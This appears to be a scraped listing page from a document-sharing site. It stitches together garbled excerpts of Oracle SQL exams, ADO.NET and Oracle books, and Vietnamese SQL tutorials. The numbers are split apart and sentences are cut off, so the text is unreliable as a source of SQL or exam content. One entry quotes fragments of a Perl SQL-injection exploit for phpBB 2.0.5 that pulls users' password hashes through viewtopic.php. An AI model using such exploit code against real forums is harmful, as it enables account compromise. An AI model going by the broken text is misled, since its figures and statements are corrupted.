Oracle SQL Exam No. 2
... 100 12- JAN -20 00 15 10000 101 09-MAR -20 00 40 8000 1 02 09-MAR -20 00 35 125 00 103 15-MAR -20 00 15 120 00 104 25 -JUN -20 00 15 6000 105 18-JUL -20 00 20 5000 106 18-JUL -20 00 35 7000 107 21 -JUL -20 00 20 6500 ... EMPLOYEE_ID EMP_NAME DEPT_ID 101 Smith 20 1 02 Martin 103 MGR_ID JOB_ID SALARY 120 SA_REP 4000 10 105 CLERK 25 00 Chris 20 120 IT_ADMIN 420 0 104 John 30 108 HR_CLERK 25 00 105 Diana 30 108 HR_MGR 5000 ... EMP_NAME DEPT_ID MGR_ID JOB_ID SALARY 101 Smith 20 120 SA_REP 4000 1 02 Martin 10 105 CLERK 25 00 103 Chris 20 120 IT_ADMIN 420 0 104 John 30 108 HR_CLERK 25 00 105 Diana 30 108 HR_MGR 5000 106 Smith...
Ngày tải lên: 02/11/2012, 13:21
... this would be to name the tables Sales2003, Sales2004, and so on Instead, a column should be added to a generic Sales table called Year, and the values 20 03 and 20 04 should be placed against the ... next couple of decades, databases continued to evolve Modern databases such as Oracle, Microsoft SQL Server, MySQL, and LDAP are all highly influenced by these first few databases They have improved ... accessing ODBC data stores through the JET engine Later, versions 2. 5 and 3.0 were released to provide support for ODBC 2. 0 and the 32- bit OS introduced with Windows 95 History of Data Access Application...
Ngày tải lên: 12/12/2013, 21:16
... 1 92 1 92 1 92 197 199 199 20 1 20 2 20 3 20 9 21 1 21 9 22 1 22 6 22 8 23 1 Contents Getting Ready for Use Summary For More Information Chapter 9: T -SQL Language and Enhancements An In-Depth Look at T -SQL ... 4 12 4 12 418 418 419 422 422 422 425 426 426 427 428 428 428 430 4 32 4 32 436 438 460 464 465 465 Open Source and Licensing Databases 465 466 MySQL MaxDB (formerly SAPdb) Firebird Ingres PostgreSQL ... Summary For More Information 23 3 23 3 23 4 23 5 23 8 24 0 24 9 25 0 25 2 25 4 25 6 25 6 26 4 26 4 Chapter 10: ADO.NET Programming with SQL Server from a Client Application 26 5 SQL Server and ADO.NET Asynchronous...
Ngày tải lên: 12/12/2013, 21:16
Professional ADO dot NET 2 Programming with SQL Server 2005 Oracle and MySQL doc
... 1 92 1 92 1 92 197 199 199 20 1 20 2 20 3 20 9 21 1 21 9 22 1 22 6 22 8 23 1 Contents Getting Ready for Use Summary For More Information Chapter 9: T -SQL Language and Enhancements An In-Depth Look at T -SQL ... 4 12 4 12 418 418 419 422 422 422 425 426 426 427 428 428 428 430 4 32 4 32 436 438 460 464 465 465 Open Source and Licensing Databases 465 466 MySQL MaxDB (formerly SAPdb) Firebird Ingres PostgreSQL ... Summary For More Information 23 3 23 3 23 4 23 5 23 8 24 0 24 9 25 0 25 2 25 4 25 6 25 6 26 4 26 4 Chapter 10: ADO.NET Programming with SQL Server from a Client Application 26 5 SQL Server and ADO.NET Asynchronous...
Ngày tải lên: 14/03/2014, 19:20
Professional ADO.NET 2 Programming with SQL Server 2005, Oracle, and MySQL potx
... 1 92 1 92 1 92 197 199 199 20 1 20 2 20 3 20 9 21 1 21 9 22 1 22 6 22 8 23 1 Contents Getting Ready for Use Summary For More Information Chapter 9: T -SQL Language and Enhancements An In-Depth Look at T -SQL ... 4 12 4 12 418 418 419 422 422 422 425 426 426 427 428 428 428 430 4 32 4 32 436 438 460 464 465 465 Open Source and Licensing Databases 465 466 MySQL MaxDB (formerly SAPdb) Firebird Ingres PostgreSQL ... Summary For More Information 23 3 23 3 23 4 23 5 23 8 24 0 24 9 25 0 25 2 25 4 25 6 25 6 26 4 26 4 Chapter 10: ADO.NET Programming with SQL Server from a Client Application 26 5 SQL Server and ADO.NET Asynchronous...
Ngày tải lên: 27/06/2014, 12:20
Oracle SQL Internals Handbook phần 2 pdf
... order by 4 ,2; SID PARSE_CNT CACHE_CNT PCT -150 26 1 38 14.55 175 85 19 22 .35 12 710399 3447 62 48.53 28 26 61 1469 55 .2 107 627 62 36487 58.13 23 6 510 339 66.47 20 5 37379 24 981 66.83 ... SYS_OUTLINE_ 020 503165 427 311 NO_EXPAND SYS_OUTLINE_ 020 503165 427 311 ORDERED SYS_OUTLINE_ 020 503165 427 311 NO_FACT(SO_DEMO) SYS_OUTLINE_ 020 503165 427 311 FULL(SO_DEMO) SYS_OUTLINE_ 020 503165 427 311 NOREWRITE ... '(' select count(1) cnt,substr (sql_ text,1,instr (SQL_ text,'(')) string from v$sqlarea group by substr (SQL_ text,1,instr (SQL_ text,'(')) order by 1; Again I get almost 20 0 rows back An example is:...
Ngày tải lên: 08/08/2014, 20:21
Giáo trình Oracle SQL cơ bản
... 17- 12- 1980 20 - 02- 1981 22 - 02- 1981 02- 04-1981 01-05-1981 09-06-1981 08-09-1981 28 -09-1981 17-11-1981 03- 12- 1981 03- 12- 1981 23 -01-19 82 09- 12- 19 82 12- 01-1983 17- 12- 1981 20 - 02- 19 82 22- 02- 19 82 02- 04-19 82 ... 31- 12- 1981 31-01 -20 01 28 -0 320 01 31-03 -20 01 17- 12- 1980 31- 12- 1980 31-01 -20 01 28 -0 320 01 31-03 -20 01 09- 12- 19 82 31- 12- 19 82 31-01 -20 01 28 -0 320 01 31-03 -20 01 12- 01-1983 31-01-1983 31-01 -20 01 Một số hàm khác ... 79 02 7566 7788 77 82 17-11-1981 01-05-1981 09-06-1981 02- 04-1981 28 -09-1981 20 - 02- 1981 08-09-1981 03- 12- 1981 22 - 02- 1981 03- 12- 1981 17- 12- 1980 09- 12- 19 82 12- 01-1983 23 -01-19 82 SAL COMM 5000 28 50 24 50...
Ngày tải lên: 16/08/2012, 15:06
Trả lời bài tập Oracle SQL*LOADER
... load qui ước, SQL* Loader đọc nhiều record liệu từ file input vào mãng liên kết Khi mãng đầy, SQL* Loader đưa liệu cho chế xử lý Oracle SQL hay tối ưu hóa để chèn Trong load trực tiếp, SQL* Loader ... SQL* Loader đọc record từ datafile, chuyển trực tiếp vào khối liệu Oracle ghi chúng lên đóa, bỏ qua hầu hết việc xử lý sở liệu Oracle Vì thời gian xử lý tùy chọn thường nhanh cách nạp (load) quy ... TRẢ LỜI BÀI TẬP ORACLE Ba cách sử dụng thông số hàng lệnh nạp liệu: • Chỉ đònh giá trò tùy chọn mà không cần gọi...
Ngày tải lên: 22/08/2012, 09:50
Oracle SQL Exam No. 1
... 100 12- JAN -20 00 15 10000 101 09-MAR -20 00 40 8000 1 02 09-MAR -20 00 35 125 00 103 15-MAR -20 00 15 120 00 104 25 -JUN -20 00 15 6000 105 18-JUL -20 00 20 5000 106 18-JUL -20 00 35 7000 107 21 -JUL -20 00 20 6500 ... COUNTRY_ADDRESS POSTAL_CODE CUSTOMER_PHONE NUMBER(4) VARCHAR2(100) VARCHAR2(150) VARCHAR2(50) VARCHAR2(50) VARCHAR2(50) VARCHAR2(50) VARCHAR2( 12) VARCHAR2 (20 ) NOT NULL NOT NULL Which statement finds the ... tables: Oracle SQL Exam No.1 - 20 05 Page 10 of 14 EMPLOYEES EMPLOYEE_ID NAME DEPT_ID MGR_ID JOB_ID SALARY 101 Smith 20 120 SA_REP 4000 1 02 Martin 10 105 CLERK 25 00 103 Chris 20 120 IT_ADMIN 420 0...
Ngày tải lên: 02/11/2012, 13:21
Phpbb 2.0.5 Sql Injection Password, disclosure Exploit
... 120 52 use IO::Socket; $remote = shift || 'localhost'; $view_topic = shift || '/phpBB2/viewtopic.php'; $uid = shift || 2; $port = 80; $dbtype = 'mysql4'; # mysql4 or pgsql print "Trying ... all we have to is query 32 times which $index from 1- 32 and we get ord value of all chars of # md5 hash password # # I have only tested this with mysql and pgsql Mysql 3.x does not support unions ... "?sid=1&topic_id=-1" random_encode(make_dbsql()) "&view=newest" " HTTP/1.0\n\n"; print $socket $str; print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it print $socket "Host:...
Ngày tải lên: 02/11/2012, 14:19
Giáo trình Oracle SQL cơ bản - Giới thiệu chung
... Trang Oracle - SQL PL /SQL Bảng EMP Tên cột Kiểu Điều kiện EMPNO NUMBER(4) PRIMARY KEY ENAME VARCHAR2(10) JOB VARCHAR2 (9) MGR NUMBER(4) HIREDATE DATE Ngày gia nhập công ty SAL NUMBER(7 ,2) Lương ... 7369 SMITH 20 7499 ALLEN 30 10 ACCOUNTING 7 521 WARD 30 20 RESEARCH 7566 JONES 20 30 SALES 7654 MARTIN 30 7698 Row ENAME BLAKE 30 40 OPERATIONS EMP DEPT DEPTNO DEPTNO DNAME Foreign key 77 82 CLARK ... hình liệu thực hành 1.3 .2 Cấu trúc bảng liệu Bảng DEPT Tên cột Kiểu Điều kiện PRIMARY KEY Diễn giải Mã phòng ban DEPTNO NUMBER (2) DNAME VARCHAR2(14) Tên phòng ban LOC VARCHAR2(13) Địa Bảng SALGRADE...
Ngày tải lên: 02/10/2013, 18:20
Tài liệu Module 2: Using Transact-SQL Querying Tools pptx
... Caracas 1 92. 168.x.19 SQLAdmin20 Montevideo 1 92. 168.x .20 SQLAdmin21 Manila 1 92. 168.x .21 SQLAdmin 22 Tokyo 1 92. 168.x .22 SQLAdmin23 Khartoum 1 92. 168.x .23 SQLAdmin24 Nairobi 1 92. 168.x .24 Estimated time ... address SQLAdmin1 Vancouver 1 92. 168.x.1 SQLAdmin2 Denver 1 92. 168.x .2 SQLAdmin3 Perth 1 92. 168.x.3 SQLAdmin4 Brisbane 1 92. 168.x.4 SQLAdmin5 Lisbon 1 92. 168.x.5 SQLAdmin6 Bonn 1 92. 168.x.6 SQLAdmin7 ... SQLAdmin7 Lima 1 92. 168.x.7 SQLAdmin8 Santiago 1 92. 168.x.8 SQLAdmin9 Bangalore 1 92. 168.x.9 SQLAdmin10 Singapore 1 92. 168.x.10 SQLAdmin11 Casablanca 1 92. 168.x.11 SQLAdmin 12 Tunis 1 92. 168.x. 12 SQLAdmin13...
Ngày tải lên: 11/12/2013, 14:15
Tài liệu Giáo trình Oracle SQL và PL/SQL cơ bản pdf
... 17- 12- 1980 20 - 02- 1981 22 - 02- 1981 02- 04-1981 01-05-1981 09-06-1981 08-09-1981 28 -09-1981 17-11-1981 03- 12- 1981 03- 12- 1981 23 -01-19 82 09- 12- 19 82 12- 01-1983 17- 12- 1981 20 - 02- 19 82 22- 02- 19 82 02- 04-19 82 ... 31- 12- 1981 31-01 -20 01 28 -0 320 01 31-03 -20 01 17- 12- 1980 31- 12- 1980 31-01 -20 01 28 -0 320 01 31-03 -20 01 09- 12- 19 82 31- 12- 19 82 31-01 -20 01 28 -0 320 01 31-03 -20 01 12- 01-1983 31-01-1983 31-01 -20 01 Một số hàm khác ... 79 02 7566 7788 77 82 17-11-1981 01-05-1981 09-06-1981 02- 04-1981 28 -09-1981 20 - 02- 1981 08-09-1981 03- 12- 1981 22 - 02- 1981 03- 12- 1981 17- 12- 1980 09- 12- 19 82 12- 01-1983 23 -01-19 82 SAL COMM 5000 28 50 24 50...
Ngày tải lên: 22/12/2013, 11:16
Tài liệu Oracle SQL Jumpstart with Examples- P1 docx
... 11.5 .2 SPREADSHEET (MODEL) Clause Functions 11.5.3 Using the SPREADSHEET (MODEL) Clause 12 Subqueries 12. 1 12. 2 12. 3 12. 4 22 4 22 5 22 6 22 8 23 0 23 0 23 5 23 5 23 7 23 7 23 8 23 8 24 0 24 0 24 0 24 1 24 2 24 5 24 5 ... Changing Data (UPDATE) 27 6 27 9 28 0 28 1 28 2 28 5 28 5 28 5 28 6 28 9 29 0 29 0 29 0 29 2 29 3 29 4 29 4 29 7 301 3 02 305 305 306 307 309 315 315 317 318 319 322 324 325 326 327 330 Please purchase PDF Split-Merge ... Statement 22 .1.3.3 Other Uses of Sequences 22 .2 Synonyms 22 .2. 1 Creating Public Synonyms 22 .2. 2 Creating Private Synonyms 22 .2. 3 Using Synonyms 22 .3 Metadata Views 23 Security 23 .1 Users 23 .1.1...
Ngày tải lên: 24/12/2013, 12:17
Tài liệu Oracle SQL Jumpstart with Examples- P2 ppt
... watermark 2 New Features of Oracle SQL In this chapter: What are the new features of Oracle SQL in Oracle Database 10g? What were the new features of Oracle SQL in Oracle Database 9i? What PL /SQL improvements ... Oracle Database 10g 2. 1 New Features in Oracle Database 10g Oracle Database 10g contains the following SQL and PL /SQL features 2. 1.1 Oracle SQL Improvements in Oracle Database 10g Oracle documentation ... synopsis of Oracle SQL and PL /SQL features introduced in Oracle Database 9i, perhaps putting some of the changes for Oracle Database 10g into perspective 2. 2 New Features in Oracle Database 9i Oracle...
Ngày tải lên: 24/12/2013, 12:17
Tài liệu Oracle SQL Jumpstart with Examples- P3 docx
... two subtraction expressions in the SELECT clause: Subtracting two numbers (the AMOUNT_CHARGED and the AMOUNT_PAID) Subtracting two dates (the SYSDATE and the DUE_DATE) When you subtract dates, Oracle ... watermark 82 4 .2 Types of SELECT Queries Figure 4.5 A Simple Query 4 .2. 1 Simple Query Once again, here is a simple query The result is shown in Figure 4.5 SELECT ARTIST_ID, NAME FROM ARTIST; 4 .2. 2 Filtered ... and physical structure of Oracle Database plus new features available in both Oracle Database 10g and Oracle Database 9i Now it’s time to begin looking into Oracle SQL itself The next chapter...
Ngày tải lên: 24/12/2013, 12:17
Tài liệu Oracle SQL Jumpstart with Examples- P4 docx
... your Oracle Database 10g session and can only be used with SQL* Plus tools (i.e., SQL* Plus, SQL* Plus Worksheet, and iSQL*Plus) Look at the entire list by running the following statement in SQL* Plus ... set to its default of 2, 000 characters SQLP[ROMPT] This option changes the SQL prompt Use the command SET SQLPROMPT ' ' to remove the prompt altogether Use SET SQLPPROMPT 'SQL> ' to return to the ... three scripts named A .SQL, B .SQL, and C .SQL in the C:\TEMP directory /tmp on UNIX The script A .SQL has an SQL* Plus command to run the B .SQL and B .SQL calls C .SQL You could start the primary script...
Ngày tải lên: 24/12/2013, 12:17
Tài liệu Oracle SQL Jumpstart with Examples- P5 docx
... months between two dates ADD_MONTHS( '27 -AUG- 02' ,4) = 27 -DEC- 02 NEXT_DAY( '27 -AUG- 02' ,'MONDAY') = 02- SEP- 02 LAST_DAY( '27 -AUG- 02' ) = 31-AUG- 02 MONTHS_BETWEEN( '27 -AUG- 02' ,'01-JAN- 02' ) = 7.83870968 ... 9 .2 Single-Row Functions ROUND(1.4) = ROUND(1.5) = ROUND(1. 423 56 ,2) = 1. 42 ROUND(1. 423 56,3) = 1. 424 ROUND(18755 .24 , -2) = 18800 SIGN(n) Returns –1 if negative, if 0, and if positive SIGN(-50 32) ... Web browser and the server 8.4 .2 iSQL*Plus versus SQL* Plus The main features of iSQL*Plus are similar to the features of SQL* Plus or SQL* Plus Worksheet: Enter SQL commands in a box and click...
Ngày tải lên: 24/12/2013, 12:17
Tài liệu Oracle SQL Jumpstart with Examples- P6 pptx
... RULES(Q [20 05]=(((Q [20 04]-Q [20 03])/Q [20 04])+1)*Q [20 04]) ORDER BY COUNTRY, YEAR; Thus in Figure 11 .21 , we have rows for 20 03 and 20 04, Canada shows sales quantities of 12 for 20 03 and 38 for 20 04 ... MEASURES (S.SALES QS, S.REVENUE QR) RULES ( QS [20 05]=(((QS [20 04]-QS [20 03])/QS [20 04])+1)*QS [20 04] ,QR [20 05]=(((QR [20 04]-QR [20 03])/QR [20 04])+1)*QR [20 04] ) ORDER BY CONTINENT DESC, COUNTRY, YEAR; ... in a query The example in Figure 11 .24 shows 20 03 and 20 04 figures summed into 20 05, for all countries Unlike Figures 11 .22 and 11 .23 , the example in Figure 11 .24 is a sum rather than a projection...
Ngày tải lên: 24/12/2013, 12:17
Tài liệu Oracle SQL Jumpstart with Examples- P7 pdf
... in Figure 12. 3 returns all rows in the INSTRUMENT table Figure 12. 2 A Single-Row Subquery Chapter 12 Please purchase PDF Split-Merge on to remove this watermark 27 2 12. 4 Demonstrating ... queries Figure 12. 15 Subqueries in INSERT and UPDATE Statements Chapter 12 Please purchase PDF Split-Merge on to remove this watermark 28 4 12. 5 Endnotes 12. 5 Endnotes Oracle Performance ... GUESTAPPEARANCE GA); Figure 12. 7 = ANY with a Subquery Chapter 12 Please purchase PDF Split-Merge on to remove this watermark 27 6 12. 4 Demonstrating Subqueries Figure 12. 8 = SOME with a...
Ngày tải lên: 24/12/2013, 12:17